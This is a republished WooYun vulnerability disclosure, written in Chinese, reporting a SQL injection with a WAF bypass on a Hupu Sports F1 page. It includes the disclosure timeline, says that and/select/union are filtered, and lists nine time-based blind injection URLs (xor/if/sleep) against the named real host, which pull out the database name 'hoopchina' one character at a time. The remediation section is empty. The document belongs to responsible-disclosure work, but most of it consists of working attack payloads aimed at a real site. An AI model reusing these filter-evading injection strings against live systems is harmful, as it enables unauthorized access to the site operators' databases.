神刀安全网

漏洞標題: 虎扑体育某站注入(绕waf)(大陆地区)

漏洞詳情

披露狀態:

2016-04-21: 細節已通知廠商並且等待廠商處理中
2016-04-21: 廠商已經確認,細節僅向廠商公開
2016-05-01: 細節向核心白帽駭客及相關領域專家公開
2016-05-11: 細節向普通白帽駭客公開
2016-05-21: 細節向實習白帽駭客公開
2016-06-05: 細節向公眾公開

大概描述:

虎扑体育某站注入(绕waf)

詳細說明:

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=831&str=fl

过滤了 and,select,union等

漏洞標題:  虎扑体育某站注入(绕waf)(大陆地区)

只好拿最拿手的延时注入证明。

漏洞標題:  虎扑体育某站注入(绕waf)(大陆地区)

漏洞驗證:

code 区域
hoopchina


http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(1)for(1)))=104,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(2)for(1)))=111,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(3)for(1)))=111,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(4)for(1)))=112,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(5)for(1)))=99,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(6)for(1)))=104,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(7)for(1)))=105,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(8)for(1)))=110,sleep(2),0),0)%23&str=fl

http://f1.hupu.com/racepedia/rumors_arch.php?fatherclassid=83' xor if(now()=sysdate(),if(ascii(mid(database()from(9)for(1)))=97,sleep(2),0),0)%23&str=fl

修復方案:

版權聲明:轉載請註明來源 路人甲@烏雲

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞標題: 虎扑体育某站注入(绕waf)(大陆地区)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址